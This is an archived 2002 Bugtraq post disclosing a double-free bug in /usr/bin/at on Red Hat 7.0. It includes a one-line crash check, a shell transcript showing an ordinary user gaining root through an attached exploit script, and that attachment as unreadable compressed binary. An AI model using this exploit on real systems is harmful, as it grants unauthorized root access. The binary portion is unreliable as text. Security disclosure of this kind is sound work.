7828881 2002-01-17 13:19 +1300  /51 rader/ zen-parse <zen-parse@gmx.net>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-17  18:34  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20581>
Ärende: '/usr/bin/at 31337 + vuln' problem + exploit
------------------------------------------------------------
From: zen-parse <zen-parse@gmx.net>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0201171313030.13586-101000@clarity.local>

Affects: /usr/bin/at 

To check if you are potentially vulnerable to this exploit, execute:
  /usr/bin/at 31337 + vuln

If you are vulnerable this will cause:
Segmentation fault 

If not, there will be a message similar to: 
Garbled time
(possibly with some extra information)

The problem is caused by a bug in the parser which deallocates the
same  memory location twice.

This can sometimes be exploited, for the uid of "daemon",  and due to
some  other minor problems, may allow root access from there.

Attached is an exploit for Redhat 7.0.

bash-2.04$ rpm -qf /lib/libc-* glibc-2.2.4-18.7.0.3  bash-2.04$ rpm
-qf /usr/bin/at at-3.1.8-12 bash-2.04$ tar -xzf attn.tar.gz
bash-2.04$ cd attn bash-2.04$ id uid=500(evil) gid=500(evil)
groups=500(evil) bash-2.04$ ./doit.sh woot-2.04# id uid=0(root)
gid=0(root) groups=500(evil) woot-2.04# echo "I was just testing
something and you need to fix at or some malicious hacker could be
evil." |mail -s "Fix /usr/bin/at" root woot-2.04# exit bash-2.04$

-- zen-parse

-------------------------------------------------------------------------
1) If this message was posted to a public forum by zen-parse@gmx.net, it 
may be redistributed without modification. 
2) In any other case the contents of this message is confidential and not 
to be distributed in any form without express permission from the author.
This document may contain Unclassified Controlled Nuclear Information.
(7828881) /zen-parse <zen-parse@gmx.net>/-(Ombruten)
Bilaga (application/x-gzip) i text 7828882
7828882 2002-01-17 13:19 +1300  /25 rader/ zen-parse <zen-parse@gmx.net>
Bilagans filnamn: "attn.tar.gz"
Importerad: 2002-01-17  18:34  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20582>
Bilaga (text/plain) till text 7828881
Ärende: Bilaga (attn.tar.gz) till: '/usr/bin/at 31337 + vuln' problem + exploit
------------------------------------------------------------
‹;®D<íZ{wÛ¶ÏßüëÔRBK¤D=\GÉéÒ¤ÉÙòX랞5vw@´8S$Ç-õ±Ï¾ß@Šò#ÙΚ¬ÛK"pqû¾ /Ëdxçã6ÛvíÙd‚o۞MݝoÝîØ3wä8£Éؙݱ{2Ýa“¼/Ùª¢ä9cwÄE¿îCãÿ¥“ü‹*
Š¥ˆãA”d¿ý§=uÝ[åïL”üñ?NF€ÆÎfÿö[¹ÞþÏå¿âQÒë?¬e. =Û²ûGúùlû\%q”œ÷Ìç¯_>BmVÙVoLkáÇ=sèEШ¥i™—iZšrò¯ÆšÎ®Ýܤýóà‚'¾>ŽùÐþgö¤öÿS{:%û§ÐÙÿ'hß%~̋"
#°'iRæiãç«Êó"	Ó|ÅË(Mƒ©öŠ_ð¸x“§Y`5€ní¹ªçÛLøæ>çIorƾïª(¿JK<gÁ½X°2eÏÒ\Dg	$<.Ãp¹gÏí¹ÜsݱMOü!vÌ 7Ó`û6ð1›y¡;…|>ŸS1\Ï·Ýñát$FÎܙO]1ã3ߙ8#>ž3Þ ÀÀC2å¾ç ûÐà‡“©=™ø£ÀÚsgìzîØñ9@}ÇOlgæÏ&¡SLJ¾Æ#º>Ÿ‡FÌ<Ï|×{ópâÏ=1¹çO§áöÁm'œzÜQaÿ’\þ
ùKû£$ËßL©®4iÿ#û6ûwwv%þl¸„Îþ?Aû쮎×Ægìx¬ðó(+™Ïæ	VÐ9X"‚|Æ.Óüœ¥UÉÊ¥`~šçÂ/\A%
‚,@-åøWOŸÿðúÕSSgß¾øA—9÷Ãb›´ÊY˜GúGss!z}9#ÒL$ô‰/JJ‘‹¢$¯V‰Oš_èՀI¬³8JÂR¤+>ÀÅÑ9mi¯^ñ@œÜ•Y
;Hِ2¨¿ó
~懃'Ï¿<fÐ?LëE!‹Jv]€¾Wé]–åé*+-|‹¢`?>‘-ó
ãgÈ¢}&×gH›°3‰œ_!æÎr€£©…Y¡¤Ž!ÅB°i90òzÉ6‚/ƒA
ˆWqI©ñ¡`Ašì—R.–Ä~’ätí‡ÄµL/I>g¢ÔtâÁ«¢8°ä¯Ò¢$äQÂKo0™P@ü䈁ðì52r7èÁ€ÖüCرތ\|Ü.*i/£8Ö{Ý(J€6tA°Y
/(ãÁ’—º/A¤¸¨âDä´Aɬ?TŒ^4PZ©±‘\]êLnÛ%CŒâà°ítÉ/@%mZæ±°03—ÊɱI‘x›ú®¢Ì+©wP,0,
Ù%í	ûR(0§ÏŽ«<ÁX¨¹³Ê*(.[¥IT¦9é'õÙ× ™³,Ð=àÉx&r‹³˜çg›Z­0…Øl˜Ïós¡¦ûìû<*•Y„é%èbW	Û£‰ò‚—¡¸fuJ㞠	D_•EAmòçQDBJPϑÜ	²åÎIf«M!âpPC½¡€-´&Be
lQc#i°KšJ…’’Ådw—Q¹$­Z
‰Ðí³'qZåÄF(Ÿ@ãý4	 eqÞ9T“æI¸8
ÕôIŸ½&~5³eï´ÏÞDþ9«2ÉÅ]92ë³ç‘BB4Õ¬+ӌ„"ä&[S¡À~æ}×ê)ñÍûì…RA¸¸ˆ?)ü(­
¦°À}0q"AkEQKjõôåâ §eÑ_ˆ¶ÚIr»Ï¾K‘'‚c[RiÅË<-……¯ëš1RšÑR¾‚—¬Å_놸ëÔ,VD«,¾¾ø­B}ùݓçÃøš¨wa­ÕŠç̞͌|ÅB6¼à¹rcg<¾¿}.9Ó߃®;†/
M'í~a
Eé[4dí7E–¦±EðæÛ,¬Kž'`Ëdœ+NZUÓA±Ö ”ßtd´´LϤÍî#ì×bKĺ”ÌÅT(’T”ŸXf½8üA ’MMÁp»;=¾JOîîöÝn
1ˆ)èôóÕ[ù·Ô+ä˜nmÁ·Oÿl¿TçC6¬Š\RÅyÔbµá/W)H°nÀþ2evä úHVSÙ
¹nBt£GÃ@\“*Ž»òÿ÷ÚdþPæôqóÿ÷œÿŽ'îøZþ?v»üÿS´mþoÔY5£
3A´üÙ`ÊASÎøw}æç!ÂÿÀozò‘'i®:¶Í9!aBÿö¼Ù×sò:?¦<þþÐøµµ$%´étöÏAáLÝoþzÅ7*÷«óSŽDÙÛ-D(£ûÀdMª¡ü·Cën^q¤\ ‹¿eAM;e¿üÂVçA”7]è mš/ù9EÝmÒ)jÀ”#¦sÓ¯^|c™û{ôsß´öÙC¹‘(ÉàG喰#ŸdQ&4«P¨à‡a?~¬¾³E
Ѳ͟›µLµ–%—A,z(契’k-¢$‰EZâ}"-Y½a-溃y&7ÐÂܨ	;HPoqä½g¥+	,¶£2Íz­ÞöRM·¡žV(jDõµ.(Ž+åÔˆÉ†Ø8Bhkâ)@uƒ>Ÿ6èž g“ø¶‡âÆMÚÕ8{GÓ«‚ŸµtÝ֊ûúÙ³oŸ·u´™Aá˜,s|Šç¤ >MŸ[ÖÈöŸ,yr¦éEZ©2B¨Òg²îkÕ릮‚MƚA28e€£Ooœµ¿7Ú¿:eo¼`2¼I%*RâHÕ¤.II/û†H@ß{o¾ÿʀ#Hó’¿|£YÔIeŒd:…ÜÉo2°zìV"¯HB¶S‡»,^!ox“ßlÃ$d!ÇÚÛ$jèôBäE9½Õ€ƒ„E#DÊþ0B¡1@Ö
˯)a¶º¸¡›xÊHï’½]?eŸNJ® [}'z/zƒÊ»̀T_yHó})W*Ì5 £Ã˜_·Éþlï3$˜]¯¦ŸGWžÇêYZƒv{$PÕ«õ‚:¶Z!7®L]9gå¹õ’â]½äÖ]µåìµî³ä³ÃöFlol(tòQ῅i;’“Í®X~ß¹¯Ìÿt|øXk|àþDZgWï»óßOÕjwý§¯þxüš™THãazå"Ny`\ÏGd¿_țâ,G{¦>se!‡_
¾`÷Š“Ä´
u•=GÞüÛ+fLcaûjþŸnœûVý£¹x®nõ—È»z&Y˜¼u¡<)6¥3%?,oHe/]A&
{wÃ>Ñ`ê³QuF’2	$‘h’B˔e-èÝ>FõÂöõ÷î2òÄb&ÕxrÊIÅf%!G­fBQŠ0·
s:IÒl„z‚kŽ­þLÅxÿ¿=›ÍÚ|¨—½By’RÈ?‡Äã«4·\`“¥ÝÀ)T»ĺûüÿ™&ýÿ6­ÿ(k|èþŸ^ö¹âÿ'î¬óÿŸ¢ý5J`ÔÊ;Ã[ÀÓ
åj
ÊB·^ïzX W”^&·¼d釴¿º
h:s(P°_
¤R%‰ÛÝCŸ¬)ûWõËÇZãöïºôÎϕüoÒÙÿ'iÆpÈzú¦ÙbA*
ʐ䢺£us§N·N1óâôò1{‰«P—F„„ÅÈèÊh…ª‡«ÎäaC2˜:<€>|ÈòÔW÷ÜÖÎc–ÑÍ9ûžªG‰Å,AÁKÙ]7ׅõ6PUö
‚|™Q¸Ùhè÷¢DÞÿ#ÏIºvåýî]Í`Fˆ6)	j¶B¾C€=ƑWÐ-k+{ßÉÈÕs‘æY–©ú¬Ïi1‡ñü¬ZaiÆ}[ÊSð5_QNÛ3PÙÒiI‚0áâ­s*©–ëžQƒ§ <©¼PèeÞÌ©™_}‰=niQ„ôá?ZŒë5¾¨IìÓÌAúf?…y!ޞ.ód-¼“µž¬'âd=?<YϦ'kÎOÖcçdíÛ蛟¬]ôÍfjܝš4Í÷OÖ†mOu‡c|j:ýžLœßs[N#¬žf»ÆNð<ëÓ ¦›TȚG¨WP•ô¨ØxgIrM’ÉP÷îîÂég‡òÚLË$Ž^_f:þ Õ¯ßmÝ^Œ¡¸Mf®ƒDVƒoÕ	òãx](Qü£üN¯\ÄBd=—²m¦„¨€uQEä(5•÷Iœõo‘\4$ÿd/lëk/Cú?Ò
8j@пˆõwÀ‹è§TH–@Œ=¼M¦öi݁]¾H?Þty7ô5¥NeEUDg‰ÀýìZW,D&ÈSÿZeŽ_=%ëæÈFQºšiÖ±Ì{Å=ÿ^‚´­Ì²¦Ió^¶hº°töàÁVâ÷³8‚²
?ê=(Á¶Ç9ߎ?pn‚ðýÄä&ÏkA¸L‹q_³d—p=m×u^%OÖzv›zHÇ2[‡O;¬T,SžO…(Õï¿ÿÚ½}©kZZót¥
DÚL´ѬÓyÞ ~ŸÐ´ k©åu‰»j'†­	®š6@ßÚ§ä‚l%V…(åþmKª´Šv÷úжԻ“rHÉ8^Œô´Î4Òî?Ð=Êáõï¹GñÃCšy?X¸šÒàø­¿žØGM‡Ca«c$;ÂmÇøT“¢¡æ¼'Yÿåññ«”*IÏÛ˜^J.$ ÉÓ«·O2Væôò
…†ÁM¬Pò/s?Û(	ÿ°M%
֓Ô×Ó>§=jòi¥Sk¸o)…+äŠ9ۍi‘«}m£í%½*E‡ù0YzÙC¬²Ûåq¼±$43u4ŒÈïq/ÞP„GøC”ŠÓRG÷AyƒøUÑl}C°L«3¤%EÊ.—)óy.ŠÇÖ)J-)O x§¾|–P›æ
½\F±¨5€tøáȵûšL²•Ï/$ûä]žì¨OSÔ)“V{N¤ŸU]qÒµ®u­k]ëZ׺ֵ®u­k]ëZ׺ֵ®u­k]ëZ׺ֵßkûÄï¼P
(7828882) /zen-parse <zen-parse@gmx.net>/-(Ombruten)